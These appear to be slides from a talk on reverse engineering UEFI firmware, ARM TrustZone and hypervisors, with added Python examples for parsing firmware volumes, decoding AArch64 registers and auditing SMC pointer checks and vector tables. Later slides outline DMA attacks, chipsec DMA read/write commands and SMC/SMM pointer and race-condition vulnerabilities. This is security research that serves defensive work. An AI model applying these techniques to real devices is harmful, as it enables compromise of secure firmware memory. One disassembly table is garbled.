|------|--------------|----------------------------------------------------------------|
| 0    | CLUST_SELECT | 0 indicates cluster 0 selected, 1 indicates cluster 1 selected |

#### 0xF900D22C APCS\_ALIAS0\_MISC\_PWR\_CTL

Type: RW Clock: SYS\_AHB\_CLK Reset State: 0x00000000

Security Treatment: Controlled by GLB\_SECURE[CFG]

Miscellaneous Power Control Register

#### 0xF900E008 APCS\_ALIAS1\_BOOT\_START\_ADDR\_NSEC

Type: RW Clock: SYS\_AHB\_CLK Reset State: 0xFC010000

Security Treatment: Secure and Nonsecure access

The BOOT\_START\_ADDR\_NSEC register is used to determine the address to boot from in nonsecure mode. It resets to the value on SYS\_apcsCFGRSTADDR[31:16]. Reset by SYS\_apcsSYSPor\_Ares|SYS\_apcsSys\_Ares

#### APCS\_ALIAS1\_BOOT\_START\_ADDR\_NSEC

| Bits  | Name          | Type | Description                                                                |
|-------|---------------|------|----------------------------------------------------------------------------|
| 31:16 | START_ADDR    | RW   | Start address for the A53                                                  |
| 2     | BOOT_128KB_EN | RW   | 128 KB BOOT enable                                                         |
| 1     | VINITHI       | R    | This is an RO field and returns a copy of the BOOT_START_ADDR_SEC VINITHI value |
| 0     | REMAP_EN      | RW   | Enable remapping                                                           |

Note the difference in security treatment: the first two registers are gated by secure-world configuration, while BOOT\_START\_ADDR\_NSEC, which decides where a core starts executing in the Normal World, is accessible from both worlds.

#### Reverse engineering of the x86 UEFI firmware

1. Dump the BIOS from the SPI chip (or download it from the vendor web-site)
   - Software method, using the CHIPSEC tool: chipsec\_util spi dump <file\_name>
   - Hardware programmer, for example: dediprog
2. Unpack all PEI/DXE executables
   - chipsec\_util decode rom.bin
3. Load them into IDA Pro
   - ida-efiutils: useful scripts for reverse engineering BIOS/UEFI binaries (from snare): <u>https://github.com/snare/ida-efiutils</u>
   - Useful blog posts from @d\_olex: <u>http://blog.cr4.sh/</u>
   - Finding the definitions of the GUIDs a module references helps to understand its functionality
   - Use <u>efiperun</u> to emulate an EFI executable
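Step 2 above is a walk over the firmware-volume (FV) and FFS file structures of the dump. The following added example (not CHIPSEC or any other tool's code) parses those headers and lists each file's GUID, type and sections; the GUIDs it prints are what step 3 looks up. It builds a small constructed FV in memory so it runs without a flash dump; the file GUIDs, the "DemoDxe" name and the FV attribute value are made up for the sample.

```python
"""Minimal walker for a UEFI firmware volume (FV) and the FFS files inside it,
the structure that step 2 above unpacks. Added example, not CHIPSEC or UEFITool
code; it builds a small constructed FV in memory so it runs without a flash dump."""
import struct
import uuid

FV_HEADER = struct.Struct("<16s16sQ4sIHHHBB")  # EFI_FIRMWARE_VOLUME_HEADER, 56 bytes + block map
FFS_HEADER = struct.Struct("<16sHBB3sB")       # EFI_FFS_FILE_HEADER: Name, IntegrityCheck, Type, Attributes, Size[3], State
SECTION_HEADER = struct.Struct("<3sB")         # EFI_COMMON_SECTION_HEADER: Size[3], Type
EFI_FIRMWARE_FILE_SYSTEM2_GUID = uuid.UUID("8c8ce578-8a3d-4f1c-9935-896185c32dd3")

FILE_TYPES = {0x01: "RAW", 0x02: "FREEFORM", 0x03: "SECURITY_CORE", 0x04: "PEI_CORE",
              0x05: "DXE_CORE", 0x06: "PEIM", 0x07: "DRIVER", 0x08: "COMBINED_PEIM_DRIVER",
              0x09: "APPLICATION", 0x0A: "SMM", 0x0B: "FIRMWARE_VOLUME_IMAGE",
              0x0C: "COMBINED_SMM_DXE", 0x0D: "SMM_CORE", 0xF0: "FFS_PAD"}
SECTION_TYPES = {0x01: "COMPRESSION", 0x02: "GUID_DEFINED", 0x10: "PE32", 0x11: "PIC",
                 0x12: "TE", 0x13: "DXE_DEPEX", 0x14: "VERSION", 0x15: "USER_INTERFACE",
                 0x17: "FV_IMAGE", 0x19: "RAW", 0x1B: "PEI_DEPEX"}


def _u24(b):
    return int.from_bytes(b, "little")


def _align(off, a):
    return (off + a - 1) & ~(a - 1)


def parse_sections(data):
    """Walk the 4-byte aligned section headers of one FFS file body."""
    out, off = [], 0
    while off + SECTION_HEADER.size <= len(data):
        size_b, stype = SECTION_HEADER.unpack_from(data, off)
        size = _u24(size_b)
        if size < SECTION_HEADER.size:
            break
        body = data[off + SECTION_HEADER.size:off + size]
        name = SECTION_TYPES.get(stype, "0x%02X" % stype)
        if stype == 0x15:                                   # UCS-2, NUL-terminated module name
            name += "(%s)" % body.decode("utf-16-le").rstrip("\0")
        out.append(name)
        off = _align(off + size, 4)
    return out


def parse_fv(buf):
    """Return (filesystem GUID, [(file GUID, file type, [section names])]) for one FV."""
    _, fs_guid, fv_len, sig, _, hdr_len, _, _, _, _ = FV_HEADER.unpack_from(buf, 0)
    if sig != b"_FVH":
        raise ValueError("no _FVH signature: not a firmware volume")
    files, off = [], hdr_len                                # block map sits inside hdr_len
    while off + FFS_HEADER.size <= min(fv_len, len(buf)):
        name, _, ftype, _, size_b, _ = FFS_HEADER.unpack_from(buf, off)
        if name == b"\xff" * 16:                            # erased flash after the last file
            break
        size = _u24(size_b)
        if size < FFS_HEADER.size:
            break
        body = buf[off + FFS_HEADER.size:off + size]
        sections = [] if ftype in (0x01, 0xF0) else parse_sections(body)
        files.append((str(uuid.UUID(bytes_le=name)), FILE_TYPES.get(ftype, "0x%02X" % ftype), sections))
        off = _align(off + size, 8)                         # files are 8-byte aligned in the FV
    return str(uuid.UUID(bytes_le=fs_guid)), files


def _section(stype, body):
    return SECTION_HEADER.pack((SECTION_HEADER.size + len(body)).to_bytes(3, "little"), stype) + body


def _ffs_file(guid, ftype, body):
    size = FFS_HEADER.size + len(body)
    # State 0xF8: with erase polarity 1 the HEADER_CONSTRUCTION/HEADER_VALID/DATA_VALID bits read as cleared
    return FFS_HEADER.pack(guid.bytes_le, 0, ftype, 0, size.to_bytes(3, "little"), 0xF8) + body


def build_sample_fv():
    """Constructed 4 KiB FV: one DXE driver (UI + placeholder PE32 section) and one RAW file."""
    ui = _section(0x15, "DemoDxe".encode("utf-16-le") + b"\0\0")
    pe32 = _section(0x10, b"MZ" + b"\0" * 62)                         # stand-in bytes, not a real PE
    drv = _ffs_file(uuid.UUID("11111111-2222-3333-4444-555555555555"), 0x07,
                    ui + b"\0" * (-len(ui) % 4) + pe32)
    raw = _ffs_file(uuid.UUID("aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"), 0x01, b"config")
    body = drv + b"\xff" * (-len(drv) % 8) + raw + b"\xff" * (-len(raw) % 8)
    fv_len, hdr_len = 0x1000, FV_HEADER.size + 16                      # one block-map entry + terminator
    hdr = FV_HEADER.pack(b"\0" * 16, EFI_FIRMWARE_FILE_SYSTEM2_GUID.bytes_le, fv_len, b"_FVH",
                         0x0004FEFF, hdr_len, 0, 0, 0, 2) + struct.pack("<IIII", 1, fv_len, 0, 0)
    return hdr + body + b"\xff" * (fv_len - hdr_len - len(body))


if __name__ == "__main__":
    fs, files = parse_fv(build_sample_fv())
    print("filesystem", fs)
    for guid, ftype, sections in files:
        print(guid, ftype, sections)
```

On a real dump the same loop runs per FV found by scanning for the _FVH signature; compressed and GUID-defined sections wrap further sections and need one more decoding step before the PE32/TE image can be handed to IDA.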

## **ARM TrustZone Binary**

- (Google phones specific) Download the factory image from the <u>Google repository</u>
- Use <u>unpack bootloader image</u> by <u>laginimaineb</u> to unpack bootloader-<DID>.img
- Extracted files:

aboot cmnlib hyp imgdata keymaster pmic rpm sbl1 sdi sec tz

- **Disassemble** tz

IDA segment listing of the tz image (the slide labels the first group of 32-bit segments as the TZ kernel and the later group, including the 64-bit code segment at 0x06D96000, as the TZ monitor):

| Seg | Start    | End      | R | W | X | Class | Bits |
|-----|----------|----------|---|---|---|-------|------|
| 01  | 06D00000 | 06D44640 | R |   | X | CODE  | 32   |
| 02  | 06D45000 | 06D46F90 | R |   | X | CODE  | 32   |
| 03  | 06D47000 | 06D4722C | R |   | X | CODE  | 32   |
| 04  | 06D48000 | 06D4B34C | R |   | X | CODE  | 32   |
| 05  | 06D4C000 | 06D5AB20 | R |   |   | DATA  | 32   |
| 06  | 06D5B000 | 06D6B75C | R | W |   | DATA  | 32   |
| 07  | 06D8BC00 | 06D8C000 | R | W |   | DATA  | 32   |
| 08  | 06D8C000 | 06D8D748 | R | W |   | DATA  | 32   |
| 09  | 06D8E000 | 06D96000 | R | W |   | DATA  | 32   |
| 0A  | 06D96000 | 06D9BFC0 | R |   | X | CODE  | 64   |
| 0B  | 06D9C000 | 06DB30CC | R | W |   | DATA  | 64   |

## **Test Environment**

- Rooting unlocked Android phones: <u>CyanogenMod</u>, <u>TWRP</u> with <u>SuperSU</u> and a custom kernel
- Useful resources: <u>xda</u>, <u>Code Aurora</u>
- Tools:
  - <u>The Rekall Forensic and Incident Response Framework</u>
  - <u>Maplesyrup Register Display Tool</u>
  - <u>ARMageddon: Cache Attacks on Mobile Devices</u>
  - <u>Drammer - for testing Android phones for the Rowhammer bug</u>

## ARM TrustZone and Hypervisor Reverse Engineering



## **Open Source TrustZone Implementations**

- ARM reference implementation - <u>ARM Trusted Firmware</u>
  - Boot Loader stage 1 (BL1) AP Trusted ROM
  - Boot Loader stage 2 (BL2) Trusted Boot Firmware
  - Boot Loader stage 3-1 (BL31) EL3 Runtime Software
  - Boot Loader stage 3-2 (BL32) Secure-EL1 Payload (optional)
  - Boot Loader stage 3-3 (BL33) Non-trusted Firmware
- <u>OP-TEE Trusted OS</u> Linux TEE using ARM TrustZone technology. Meets GlobalPlatform System Architecture spec
- Google's <u>Trusty</u> is a set of components supporting a TEE on mobile devices

```
	.globl	runtime_exceptions

	/* -----------------------------------------------------
	 * This macro handles Synchronous exceptions.
	 * Only SMC exceptions are supported.
	 * -----------------------------------------------------
	 */
	.macro	handle_sync_exception
	/* Enable the SError interrupt */
	msr	daifclr, #DAIF_ABT_BIT

	str	x30, [sp, #CTX_GPREGS_OFFSET + CTX_GPREG_LR]

	mrs	x30, esr_el3
	ubfx	x30, x30, #ESR_EC_SHIFT, #ESR_EC_LENGTH

	/* Handle SMC exceptions separately from other synchronous exceptions */
	cmp	x30, #EC_AARCH32_SMC
	b.eq	smc_handler32

	cmp	x30, #EC_AARCH64_SMC
	b.eq	smc_handler64

	/* Other kinds of synchronous exceptions are not handled */
	no_ret	report_unhandled_exception
	.endm

	/* -----------------------------------------------------
	 * This macro handles FIQ or IRQ interrupts i.e. EL3, S-EL1 and NS
	 * interrupts.
	 */
```

bl31/aarch64/runtime\_exceptions.S in ARM Trusted Firmware: the EL3 synchronous-exception path reads the exception class from ESR\_EL3 and dispatches only SMC calls, separately for AArch32 and AArch64 callers.

### **TrustZone Monitor Vector Table**

| Exception taken from                                                                                         | Synchronous | IRQ or vIRQ | FIQ or vFIQ | SError or vSError |
|--------------------------------------------------------------------------------------------------------------|-------------|-------------|-------------|-------------------|
| Current Exception level with SP_EL0                                                                          | 0x000       | 0x080       | 0x100       | 0x180             |
| Current Exception level with SP_ELx, x>0                                                                     | 0x200       | 0x280       | 0x300       | 0x380             |
| Lower Exception level, where the implemented level immediately lower than the target level is using AArch64  | 0x400       | 0x480       | 0x500       | 0x580             |
| Lower Exception level, where the implemented level immediately lower than the target level is using AArch32  | 0x600       | 0x680       | 0x700       | 0x780             |

VBAR\_EL3, Vector Base Address Register (EL3): holds the vector base address for any exception that is taken to EL3. It is accessible only from EL3 (with either value of SCR\_EL3.NS), there are no traps or enables affecting it, and its RW fields reset to IMPLEMENTATION DEFINED values that might be UNKNOWN.

The monitor stores 0x6D9B800 to VBAR\_EL3 in its entry code; IDA prints the system registers as raw encodings, which decode to VBAR\_EL3 (S3\_6\_C12\_C0\_0) and DAIF (S3\_3\_C4\_C2\_1):

```
88  00 82 00 58    LDR   X0, =loc_6D9B800      ; vector table base
8C  00 C0 1E D5    MSR   VBAR_EL3, X0           ; shown by IDA as "MSR #6, c12, c0, #0, X0"
90  00 38 80 D2    MOV   X0, #0x1C0
94  20 42 1B D5    MSR   DAIF, X0               ; shown as "MSR #3, c4, c2, #1, X0": mask A, I, F
```

ARMv8 Architecture Reference Manual
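Older IDA versions print EL2/EL3 system registers only as "#op1, cN, cM, #op2" tuples, so locating the vector-table and SCR/HCR setup in a monitor or hypervisor image means decoding those encodings by hand. The following added example (not code from the slides or from any project) decodes the MRS/MSR (register) and 64-bit MOVZ words of the listing above into register names; the register table is a hand-picked subset of the ARMv8 encodings, the four words are the ones from the listing, and the load address 0x88 is only the offset shown there.

```python
"""Decode the raw MRS/MSR and MOVZ encodings IDA shows in the monitor's entry code
(e.g. "MSR #6, c12, c0, #0, X0") into system-register names.
Added example; the register table is a hand-picked subset, the bytes below are the
four instructions from the listing above, the base address is the listing offset."""
import struct

# (op0, op1, CRn, CRm, op2) -> name, from the ARMv8 system register encodings
SYSREGS = {
    (3, 0, 1, 0, 0): "SCTLR_EL1",  (3, 4, 1, 0, 0): "SCTLR_EL2",  (3, 6, 1, 0, 0): "SCTLR_EL3",
    (3, 4, 1, 1, 0): "HCR_EL2",    (3, 6, 1, 1, 0): "SCR_EL3",
    (3, 0, 2, 0, 0): "TTBR0_EL1",  (3, 4, 2, 0, 0): "TTBR0_EL2",  (3, 6, 2, 0, 0): "TTBR0_EL3",
    (3, 4, 2, 1, 0): "VTTBR_EL2",  (3, 3, 4, 2, 1): "DAIF",
    (3, 0, 4, 0, 0): "SPSR_EL1",   (3, 4, 4, 0, 0): "SPSR_EL2",   (3, 6, 4, 0, 0): "SPSR_EL3",
    (3, 0, 4, 0, 1): "ELR_EL1",    (3, 4, 4, 0, 1): "ELR_EL2",    (3, 6, 4, 0, 1): "ELR_EL3",
    (3, 0, 5, 2, 0): "ESR_EL1",    (3, 4, 5, 2, 0): "ESR_EL2",    (3, 6, 5, 2, 0): "ESR_EL3",
    (3, 0, 12, 0, 0): "VBAR_EL1",  (3, 4, 12, 0, 0): "VBAR_EL2",  (3, 6, 12, 0, 0): "VBAR_EL3",
}
DAIF_BITS = {9: "D", 8: "A", 7: "I", 6: "F"}


def decode(word):
    """Return (mnemonic, operands) for an MRS, MSR (register) or 64-bit MOVZ word, else None."""
    if word >> 22 == 0b1101010100 and (word >> 20) & 1:      # MRS/MSR, system register form
        key = (2 + ((word >> 19) & 1), (word >> 16) & 7, (word >> 12) & 0xF,
               (word >> 8) & 0xF, (word >> 5) & 7)
        rt = word & 0x1F
        name = SYSREGS.get(key, "S%d_%d_C%d_C%d_%d" % key)
        if (word >> 21) & 1:
            return "MRS", "X%d, %s" % (rt, name)
        return "MSR", "%s, X%d" % (name, rt)
    if word >> 23 == 0b110100101:                            # MOVZ (64-bit)
        hw, imm16, rd = (word >> 21) & 3, (word >> 5) & 0xFFFF, word & 0x1F
        return "MOVZ", "X%d, #0x%X" % (rd, imm16 << (16 * hw))
    return None


def daif_masked(value):
    """Names of the exception classes masked by a value written to DAIF."""
    return [n for bit, n in sorted(DAIF_BITS.items(), reverse=True) if value >> bit & 1]


def scan(blob, base=0):
    """Walk little-endian A64 words; undecoded words are reported as raw hex."""
    out = []
    for off in range(0, len(blob) - 3, 4):
        (word,) = struct.unpack_from("<I", blob, off)
        out.append((base + off, *(decode(word) or ("?", "0x%08X" % word))))
    return out


# The four words from the monitor listing above (LDR literal, MSR VBAR_EL3, MOVZ, MSR DAIF).
MONITOR_ENTRY = bytes.fromhex("00820058" "00C01ED5" "003880D2" "20421BD5")

if __name__ == "__main__":
    for addr, mnem, ops in scan(MONITOR_ENTRY, base=0x88):
        print("%04X  %-5s %s" % (addr, mnem, ops))
    print("DAIF 0x1C0 masks", daif_masked(0x1C0))
```

Running `scan` over a whole code segment and grepping for VBAR_EL3, SCR_EL3 or VBAR_EL2 writes is a quick way to find the monitor's or hypervisor's vector table and world-switch setup before reading the rest of the image.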

#### **TrustZone Monitor SMC Exception Handler**





#### **Open Source TrustZone Driver**



### **SMC Handler Arguments in ARMv8 Systems**





#### **Reversing SMC Default Handler...**



### **Reversing Overlap Checks...**

```
unsigned int __fastcall check_buffer_args_with_TZ_addr_overlap(int p_buffer_, int buffer_, int buffer_size_)
{
  char *buffer;        // r5@1
  char *pbuffer;       // r6@1
  int buffer_size;     // r4@1
  unsigned int result; // r0@1
  char v7;             // zf@2
  bool v8;             // r1@8

  buffer = (char *)buffer_;
  pbuffer = (char *)p_buffer_;
  buffer_size = buffer_size_;
  result = 0xFFFFFFFF;
  if ( buffer )
  {
    v7 = pbuffer == 0;
    if ( pbuffer )
      v7 = buffer_size == 0;
    if ( !v7 )
    {
      /* Check "buffer" pointer for overlapping with TZ */
      if ( check_TZ_addr_overlap_(buffer_, buffer_size_) && !check_TZ_addr_overlap_((int)pbuffer, buffer_size) )
      {
        Clean_Data_Cache_Line_((int)buffer, buffer_size);
        /* Copy "buffer" and check for overlapping with TZ every DWORD in the buffer
           (race condition protection) */
        memcpy(pbuffer, buffer, buffer_size);
        v8 = check_TZ_addr_overlap_((int)buffer, buffer_size);
        result = 0;
        if ( !v8 )
          result = 0xFFFFFFEE;
      }
    }
  }
  return result;
}
```
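The reversed handler shows the pattern every SMC that takes a Normal World pointer needs: reject null or empty arguments, prove the source lies outside TrustZone memory and the destination inside it, copy, then check the source again because the secure map can change while the copy runs. The following added example models that flow in Python (the real handler is ARM code; this is not the vendor's code). The secure ranges, the addresses and the race are constructed; the two error codes 0xFFFFFFFF and 0xFFFFFFEE are taken from the listing above. It also shows the wrap-around bug an end-address check must avoid on a 32-bit core.

```python
"""Model of the buffer-argument validation above: an SMC handler that receives a
Normal World pointer must prove the buffer lies outside TrustZone memory, copy it,
and check again because the secure map may change underneath it.
Added example in Python (the real handler is ARM code); the secure ranges and
addresses are constructed, the error codes are the ones from the listing."""
MASK32 = 0xFFFFFFFF
ERR_BAD_ARGS = 0xFFFFFFFF      # what the reversed function returns for rejected arguments
ERR_TZ_OVERLAP = 0xFFFFFFEE    # what it returns when the re-check after the copy fails


class SecureMemory:
    """Toy 32-bit physical address space: a mutable list of (base, size) secure ranges
    and a dict standing in for RAM contents."""

    def __init__(self, ranges):
        self.ranges = list(ranges)
        self.mem = {}

    def overlaps_tz_naive(self, addr, size):
        """The bug to avoid: end-address arithmetic that wraps at 2**32 lets a buffer
        ending in low (secure) memory pass the check."""
        end = (addr + size - 1) & MASK32
        return any(addr <= b + s - 1 and end >= b for b, s in self.ranges)

    def overlaps_tz(self, addr, size):
        """Overflow-safe interval test; empty or wrapping ranges count as unsafe."""
        if size == 0 or addr > MASK32 - (size - 1):
            return True
        end = addr + size - 1
        return any(addr <= b + s - 1 and end >= b for b, s in self.ranges)

    def inside_tz(self, addr, size):
        """The destination must sit entirely inside one secure range."""
        if size == 0 or addr > MASK32 - (size - 1):
            return False
        return any(b <= addr and addr + size <= b + s for b, s in self.ranges)


def copy_in(mem, dst, src, size, during_copy=None):
    """Same flow as the reversed handler: validate pointers, copy, re-validate the source.
    `during_copy` simulates another core changing the secure map while the copy runs."""
    if not src or not dst or not size:
        return ERR_BAD_ARGS
    if mem.overlaps_tz(src, size) or not mem.inside_tz(dst, size):
        return ERR_BAD_ARGS
    if during_copy:
        during_copy(mem)
    for i in range(size):
        mem.mem[dst + i] = mem.mem.get(src + i, 0)
    return ERR_TZ_OVERLAP if mem.overlaps_tz(src, size) else 0


def demo():
    """Constructed layout: secure ROM/IMEM at 0 and a TZ region at 0x0E800000."""
    mem = SecureMemory([(0x00000000, 0x1000), (0x0E800000, 0x100000)])
    ok = copy_in(mem, 0x0E810000, 0x80000000, 16)
    src_in_tz = copy_in(mem, 0x0E810000, 0x0E8FFFF8, 16)
    wrapped_naive = mem.overlaps_tz_naive(0xFFFFFFF0, 0x20)   # misses the wrap into page 0
    wrapped_safe = mem.overlaps_tz(0xFFFFFFF0, 0x20)          # rejects it
    raced = copy_in(mem, 0x0E810000, 0x80000000, 16,
                    during_copy=lambda m: m.ranges.append((0x80000000, 0x1000)))
    return ok, src_in_tz, wrapped_naive, wrapped_safe, raced


if __name__ == "__main__":
    print(demo())   # (0, 0xFFFFFFFF, False, True, 0xFFFFFFEE)
```

The re-check after the copy only catches a range that became secure during the window; it does not stop the Normal World from rewriting the source buffer while it is being copied, which is why the handler must work on its private copy (`pbuffer`) and never read the caller's buffer again after validation.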

#### How the check for overlap with TZ works



#### **Reversing SMC Handlers Table...**



#### **Example of SMC Handler**




#### **SMC Handler Communicates with Secure Device**



#### **Reversing Error Codes...**



#### Hypervisor on Snapdragon 808/810

EL2 vector table of the hyp image, annotated on the slide as VBAR\_EL2 (the slide also marks the hypervisor's stage 1 page tables via TTBR0\_EL2). Each 0x80-aligned vector entry saves X30/X0, passes an identifying constant (#9, #0xA, ...) in X0 to the common handler sub\_6C00FDC, and the entry shown spins after it returns; entry addresses follow from the 0x80 alignment:

```
LOAD:0000000006C08800 loc_6C08800                 ; DATA XREF: start, LOAD:off_6C00228
LOAD:0000000006C08800     B       loc_6C06FA0
LOAD:0000000006C08804     ALIGN   0x80
LOAD:0000000006C08880     STP     X30, X0, [SP,#-0x10]!
LOAD:0000000006C08884     MOV     X0, #9
LOAD:0000000006C08888     BL      sub_6C00FDC
LOAD:0000000006C0888C     LDP     X30, X0, [SP],#0x10
LOAD:0000000006C08890 loc_6C08890
LOAD:0000000006C08890     B       loc_6C08890
LOAD:0000000006C08894     ALIGN   0x80
LOAD:0000000006C08900     STP     X30, X0, [SP,#-0x10]!
LOAD:0000000006C08904     MOV     X0, #0xA
LOAD:0000000006C08908     BL      sub_6C00FDC
LOAD:0000000006C0890C     LDP     X30, X0, [SP],#0x10
```
| 00006C08910<br>00006C08910                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       | loc_6C08910      |                                                                                     | ; CODE XREF: LOAD:                                                                                                                                                                    | Translation table    |
| LOAD:000000006C014E0 80 D8 A0 D2<br>Load:00000006C014E4 40 17 00 14                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              |                  |                                                                                     | MOV X0, #0x6C40000<br>B loc_6C071E4                                                                                                                                                   |                      |
| LOAD:00000006C071E4<br>LOAD:00000006C071E4 00 20 1C D5<br>LOAD:00000006C071E8 80 01 00 58<br>LOAD:00000006C071EC 00 A2 1C D5<br>LOAD:00000006C071F0 80 01 00 58<br>LOAD:00000006C071F4 40 20 1C D5<br>LOAD:00000006C071F8 C0 03 5F D6<br>LOAD:00000006C071F8                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |                  | CO71E4<br>MSR<br>LDR<br>MSR<br>LDR<br>MSR<br>RET<br>OF FUNCTION CHU                 | ; CODE XREF:<br>#4, c2,  c0, #0, X0<br>X0, =0xBB04FF44<br>#4, c10, c2, #0, X0<br>X0, =0x80803A20<br>#4, c2, c0, #2, X0                                                                |                      |
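The listing above shows what IDA prints; the Python below, added here as an example (it is not code from the talk or from chipsec), decodes the same instruction words programmatically and then applies the idea to a whole EL2 vector table: each 0x80-byte entry is decoded and, where it begins with a `B`, the target is checked against the hypervisor image bounds, which is how a patched entry (as in the EL2 vector table patching shown later in the deck) would stand out. The vector-table layout, the `B`/`MSR` encodings and the `S3_4_*` system-register names come from the ARMv8-A architecture, not from the page; the image upper bound 0x6C40000 and the sample table are constructed for the demo.

```python
"""Decode AArch64 instruction words from the hypervisor listing and audit an EL2 vector table.

Added example, not code from the talk or from chipsec. Encodings and register
names are architectural (ARMv8-A); addresses come from the listing above except
where marked as constructed.
"""
import struct

# The 16 entries of an AArch64 exception vector table, 0x80 bytes each.
VECTOR_ENTRY_NAMES = [
    "cur EL, SP0: sync", "cur EL, SP0: IRQ", "cur EL, SP0: FIQ", "cur EL, SP0: SError",
    "cur EL, SPx: sync", "cur EL, SPx: IRQ", "cur EL, SPx: FIQ", "cur EL, SPx: SError",
    "lower EL A64: sync", "lower EL A64: IRQ", "lower EL A64: FIQ", "lower EL A64: SError",
    "lower EL A32: sync", "lower EL A32: IRQ", "lower EL A32: FIQ", "lower EL A32: SError",
]

# (op0, op1, CRn, CRm, op2) -> name, for the EL2 registers touched in the listing.
SYSREG_NAMES = {
    (3, 4, 2, 0, 0): "TTBR0_EL2",
    (3, 4, 2, 0, 2): "TCR_EL2",
    (3, 4, 10, 2, 0): "MAIR_EL2",
    (3, 4, 12, 0, 0): "VBAR_EL2",
}


def word_at(data, offset):
    """Little-endian 32-bit instruction word at a byte offset (what IDA shows as 'E8 F9 FF 17')."""
    return struct.unpack_from("<I", data, offset)[0]


def decode_b(insn, pc):
    """Unconditional B: 000101 imm26. Returns the branch target, or None if insn is not a B."""
    if (insn >> 26) != 0b000101:
        return None
    imm26 = insn & 0x3FFFFFF
    if imm26 & (1 << 25):          # sign-extend the 26-bit word offset
        imm26 -= 1 << 26
    return pc + imm26 * 4


def encode_b(pc, target):
    """Inverse of decode_b; used only to construct the demo table."""
    return 0x14000000 | (((target - pc) // 4) & 0x3FFFFFF)


def decode_msr(insn):
    """MSR (register): 1101 0101 0001 o0 op1 CRn CRm op2 Rt. Returns (register name, Rt) or None."""
    if (insn >> 20) != 0b110101010001:       # MRS has bit 21 set (0xD53...), MSR is 0xD51...
        return None
    op0 = 2 + ((insn >> 19) & 1)
    op1 = (insn >> 16) & 7
    crn = (insn >> 12) & 0xF
    crm = (insn >> 8) & 0xF
    op2 = (insn >> 5) & 7
    rt = insn & 0x1F
    key = (op0, op1, crn, crm, op2)
    return SYSREG_NAMES.get(key, "S%d_%d_C%d_C%d_%d" % key), rt


def audit_vector_table(table, vbar, image_lo, image_hi):
    """Classify every vector entry: 'ok' (B into the image), 'SUSPICIOUS' (B out of the
    image, as a diverted entry would look), or 'inline' (entry starts with a non-B
    instruction, like the STP/MOV/BL sequences in the listing)."""
    report = []
    for i, name in enumerate(VECTOR_ENTRY_NAMES):
        pc = vbar + i * 0x80
        target = decode_b(word_at(table, i * 0x80), pc)
        if target is None:
            report.append((i, name, "inline", pc))
        elif image_lo <= target < image_hi:
            report.append((i, name, "ok", target))
        else:
            report.append((i, name, "SUSPICIOUS", target))
    return report


def audit_demo_table(vbar=0x6C08800, image_lo=0x6C00000, image_hi=0x6C40000):
    """Constructed 2 KB table: entry 0 carries the bytes from the listing (E8 F9 FF 17),
    the others branch to loc_6C06FA0 as well, and entry 8 (sync exception from a lower
    EL, i.e. the HVC/trap entry) is diverted outside the image. image_hi is an assumption."""
    table = bytearray(0x800)
    table[0:4] = bytes.fromhex("E8F9FF17")
    for i in range(1, 16):
        struct.pack_into("<I", table, i * 0x80, encode_b(vbar + i * 0x80, 0x6C06FA0))
    struct.pack_into("<I", table, 8 * 0x80, encode_b(vbar + 8 * 0x80, 0x6D00000))
    return audit_vector_table(bytes(table), vbar, image_lo, image_hi)


if __name__ == "__main__":
    print(decode_msr(0xD51C2000), decode_msr(0xD51CA200), decode_msr(0xD51C2040))
    for entry in audit_demo_table():
        print("%2d %-22s %-10s 0x%X" % entry)
```

Running it names the three `MSR` targets in the listing as TTBR0_EL2, MAIR_EL2 and TCR_EL2 (the page only annotates the first), confirms that `E8 F9 FF 17` at 0x6C08800 branches to loc_6C06FA0, and flags only the diverted entry 8 in the constructed table.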

#### Firmware and Hypervisor Attack Vectors

# THERE IS ALWAYS A WAY...

mafilip.com

#### **Run-time Attack Vectors in X86**



#### Attack Vectors in modern ARMv8 SoC



Additional reading: awesome work on exploiting TrustZone by Gal Beniamini of P0 [1], [2], [3], [4]

#### **DMA** attack

- Injects a UEFI DXE driver into the target system using a pre-boot DMA attack, by d_olex [1]
- If memory protection (IOMMU) is not enabled, an attacker can read/write arbitrary memory (including the UEFI Boot Services table)
- DMA can also be used for run-time attacks, e.g. with PCILeech to compromise the OS (for example through the run-time UEFI service table, by Alex Ionescu [2])


#### **Integrated Graphics DMA: Overview**



#### Using igd command for DMA access

```
# chipsec_util.py igd
[CHIPSEC] Executing command 'igd' with args []

>>> chipsec_util igd
>>> chipsec_util igd dmaread  <address> [width] [file_name]
>>> chipsec_util igd dmawrite <address> <width> <value|file_name>
```

- Cannot access the low 1 MB legacy address space: 0x0 to 0xFFFFF
- Can access graphics stolen data memory
- Separate graphics VT-d engine (controlled by GFXVTBAR)

#### **References:**

Intel Graphics for Linux – Hardware Specification – PRMs

#### **DMA Attacks**



#### **Pointer vulnerabilities**

## Exploiting SMM pointers...



The exploit tricks the SMI handler into writing to an address inside SMRAM (Attacking and Defending BIOS in 2015)

#### Attacking hypervisors via SMM pointers...



Even though the SMI handler checks pointers for overlap with SMRAM, the exploit can trick it into writing to a VMM-protected page (Attacking Hypervisors via Firmware and Hardware)

#### **Pointer Arguments to SMC Handlers**



Some SMC handlers write their result to a buffer at the address passed in X2, ...

#### **Unchecked Pointer Vulnerabilities**



If the SMC handler doesn't validate the pointer, it can be made to overwrite TrustZone memory. Examples: <u>Full TrustZone exploit for MSM8974</u>, SMC vulns by Dan Rosenberg

#### **SMC Pointer Vulnerabilities Fuzzer**



## **Race Condition Issues (TOCTOU)**



SMC handlers may have TOCTOU issues when reading structures from X2

#### **Unchecked Addresses to MMIO Ranges**



An address within the MMIO of a secure device can be passed to an SMC handler. If the handler doesn't validate the address, it can be tricked into writing to the secure device.
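The pointer issues on the preceding slides (an SMI handler writing through a caller-supplied pointer into SMRAM or a VMM page, an SMC handler doing the same into TrustZone memory or secure-device MMIO, and the TOCTOU variant where the structure referenced by X2 changes between check and use) come down to two handler-side defects. The Python model below is an added example, not code from the talk: it puts a first-byte-only check next to a whole-range check, and a handler that re-reads shared memory after validating next to one that snapshots the request first. All addresses are constructed.

```python
"""Pointer validation in an SMI/SMC handler, modelled in Python.

Added example, not code from the talk. Every address below is constructed for
the demo and does not describe a real platform.
"""

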